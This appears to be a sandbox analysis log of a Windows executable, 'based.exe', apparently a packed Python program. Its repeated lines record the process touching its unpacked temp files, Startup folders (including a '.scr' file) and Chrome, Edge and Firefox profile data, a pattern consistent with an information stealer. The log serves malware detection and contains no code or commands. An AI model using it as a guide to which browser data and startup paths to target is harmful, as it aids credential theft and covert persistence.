Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\select.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
